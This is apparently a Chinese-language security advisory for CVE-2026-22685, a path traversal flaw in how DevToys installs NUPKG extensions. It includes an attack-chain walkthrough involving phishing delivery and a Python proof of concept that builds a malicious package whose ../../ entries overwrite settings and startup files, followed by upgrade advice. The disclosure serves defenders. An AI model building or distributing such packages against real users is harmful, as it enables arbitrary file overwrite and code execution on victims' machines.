CVE-2026-22685: DevToys路径遍历漏洞导致任意文件写入

漏洞信息

漏洞编号

CVE-2026-22685

漏洞类型

路径遍历

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

DevToys

漏洞概述

DevToys是一款面向开发者的开源桌面应用程序，提供多种开发工具集。2026年1月披露的安全漏洞存在于DevToys的扩展安装机制中，漏洞编号为CVE-2026-22685，CVSS评分高达8.8，属于高危漏洞。该漏洞影响DevToys从2.0.0.0到2.0.9.0之前的所有版本。攻击者可以利用恶意构造的扩展包（NUPKG格式）进行路径遍历攻击，通过在归档中包含精心设计的文件路径（如../../…/target-file），诱使应用程序在扩展目录之外的位置写入文件。这允许攻击者覆盖系统上的任意文件，可能导致远程代码执行、系统配置篡改或应用程序文件损坏。由于攻击需要用户交互（安装恶意扩展），且攻击复杂度较低，建议用户尽快升级到修复版本2.0.9.0。

技术细节

该路径遍历漏洞位于DevToys的扩展包处理模块中。当用户安装NUPKG格式的扩展包时，DevToys会解压归档内容到指定目录。问题在于程序在提取文件时未充分验证归档内文件条目的路径安全性。攻击者可以创建一个包含路径遍历序列的恶意NUPKG文件，例如文件路径为../../AppData/Roaming/DevToys/settings.json的文件条目。当DevToys执行解压操作时，由于缺少路径规范化检查，系统会将文件写入到用户配置目录或其他敏感位置，而非预期的扩展安装目录。攻击者可利用此漏洞覆盖关键配置文件、植入恶意DLL或修改启动脚本，从而在受害者系统上实现代码执行。漏洞的根本原因是缺少对相对路径遍历序列（../）的过滤和路径规范化验证。

攻击链分析

STEP 1

步骤1: 收集情报

攻击者识别目标用户已安装DevToys应用（版本2.0.0.0-2.0.9.0），并了解其扩展安装功能存在路径遍历漏洞

STEP 2

步骤2: 制作恶意扩展包

攻击者创建包含路径遍历文件条目的恶意NUPKG扩展包，文件路径使用../../序列（如../../AppData/Roaming/DevToys/settings.json）

STEP 3

步骤3: 分发恶意扩展

攻击者通过社交工程、钓鱼邮件或恶意网站诱导用户下载并安装该恶意扩展包

STEP 4

步骤4: 用户交互触发

受害用户在DevToys中打开扩展安装界面，选择并安装攻击者提供的恶意NUPKG文件

STEP 5

步骤5: 路径遍历利用

DevToys解压NUPKG时未验证文件路径，将包含遍历序列的文件写入扩展目录之外的任意位置（如系统配置目录或启动文件夹）

STEP 6

步骤6: 实现攻击目标

根据写入位置不同，攻击者可实现代码执行、配置篡改或系统文件损坏等攻击效果

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-22685 Path Traversal PoC
# Target: DevToys Extension Installation (NUPKG)
# This PoC demonstrates creating a malicious NUPKG with path traversal

import zipfile
import os
import sys

def create_malicious_nupkg(output_path):
    """
    Create a malicious NUPKG file containing path traversal entries
    This can overwrite arbitrary files when extracted by DevToys < 2.0.9.0
    """
    malicious_content = b'{"malicious": "config", "exec": "calc.exe"}'
    
    # Path traversal payload to write outside extensions directory
    # The ../../ sequence traverses up from the extensions folder
    traversal_paths = [
        '../../AppData/Roaming/DevToys/settings.json',
        '../../AppData/Local/DevToys/startup_config.json',
        '../../startup.bat'
    ]
    
    with zipfile.ZipFile(output_path, 'w') as nupkg:
        # Add legitimate extension manifest
        nupkg.writestr('DevToys.Extensions.TestExtension.nuspec', '''
        <?xml version="1.0"?>
        <package>
            <metadata>
                <id>DevToys.Extensions.TestExtension</id>
                <version>1.0.0</version>
                <description>Malicious extension for CVE-2026-22685 PoC</description>
            </metadata>
        </package>
        ''')
        
        # Add malicious files with path traversal
        for path in traversal_paths:
            nupkg.writestr(path, malicious_content)
            print(f'[+] Added malicious entry: {path}')
    
    print(f'[+] Created malicious NUPKG: {output_path}')
    print('[!] When extracted by DevToys < 2.0.9.0, files will be written outside extensions directory')

if __name__ == '__main__':
    if len(sys.argv) > 1:
        create_malicious_nupkg(sys.argv[1])
    else:
        create_malicious_nupkg('malicious-extension.1.0.0.nupkg')

影响范围

DevToys 2.0.0.0 - 2.0.8.x

防御指南

临时缓解措施

立即升级DevToys至2.0.9.0或更高版本。在升级前，避免从非官方渠道安装任何扩展包，对来源不明的NUPKG文件保持警惕。如无法立即升级，可暂时禁用扩展安装功能，并监控系统中DevToys相关目录的文件变化。